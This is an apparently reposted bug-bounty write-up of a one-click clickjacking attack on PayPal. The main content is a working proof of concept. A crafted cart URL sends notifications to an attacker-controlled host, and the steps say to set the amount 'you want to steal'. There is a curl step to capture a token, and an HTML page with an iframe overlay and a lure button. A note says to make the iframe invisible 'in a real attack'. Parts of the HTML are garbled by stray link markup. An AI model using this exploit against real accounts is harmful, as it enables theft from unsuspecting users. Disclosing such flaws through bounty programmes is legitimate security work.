Vulnerability In PayPal worth $200,000 bounty, Attacker can Steal Your Balance by One-Click

of course, the victim should be logged in in te the browser

Proof 0f C0ncept

"https://www.paypal.com/cgi-bin/webscr?address1=sectesting&address2=sectesting02&address_override=true&amount_1=1&business=<[email protected]>&cancel_return=https://xxxxxx.burpcollaborator.net/cancel_return&city=barika&cmd=_cart&country=DZ&currency_code=USD&email=<anything>@gmail.com&first_name=attacker&invoice=marketplace133703&item_name_1=attacker&item_number_1=133788802&last_name=attacker&notify_url=https://xxxxxx.burpcollaborator.net/notify_url&quantity_1=1&return=https://xxxxxx.burpcollaborator.net/return&state=05&upload=1&zip=1337"

In the link above change the business to attacker Paypal email, and return & notify_url to your host to receive the HTTP requests. and amount_1 how much money you want to steal from the victim's account !!.

and You can change the first/last name, and the address to your own info, and when you do this, this Billing full name/address will register in the victim account !.

2 . now send GET request using CURL, and grep the token value.

3. upload this poc.html On your host and put your token In the parameter ba_token.

<!DOCTYPE html>
<html>
<head>
    <title>POC</title>
</head>
<body>
   <center> <img src="<a "au lg" href="https://i.ibb.co/bWqXsQT/Mnanauk-2020-Chef-Mnanauk.jpg" rel="noopener ugc nofollow" target="_blank" style="box-sizing: inherit; color: inherit; text-decoration-line: underline; -webkit-tap-highlight-color: transparent;">https://i.ibb.co/bWqXsQT/Mnanauk-2020-Chef-Mnanauk.jpg"></center> 
<style>
iframe { 
  width: 1920px;
  height: 1080px;
  position: absolute;
  top:0; left:-20px;
  opacity: 1.01; 
  z-index: 1;
}
</style>
<iframe src="<a "au lg" href="https://www.paypal.com/agreements/approve?nolegacy=1&ba_token=" rel="noopener ugc nofollow" target="_blank" style="box-sizing: inherit; color: inherit; text-decoration-line: underline; -webkit-tap-highlight-color: transparent;">https://www.paypal.com/agreements/approve?nolegacy=1&ba_token=<TOKEN>"></iframe>
<button style="position: fixed; display: inline; z-index: 10; left: 701px; top: 520px;">Click here  to win 1337$ => </button></body>
</html>

Note : the opacity should be 0 in a real attack, you can change it.

Now Login to your PayPal in the browser, and open the HTML page.

Full Write up https://medium.com/@h4x0r_dz/vulnerability-in-paypal-worth-200000-bounty-attacker-can-steal-your-balance-by-one-click-2b358c1607cc

*Beware click the link!

Vulnerability In PayPal worth $200,000 bounty, Attacker can Steal Your Balance by One-Click

Sponsored

Popular Posts

Related Post

Youtube Video

Subscribe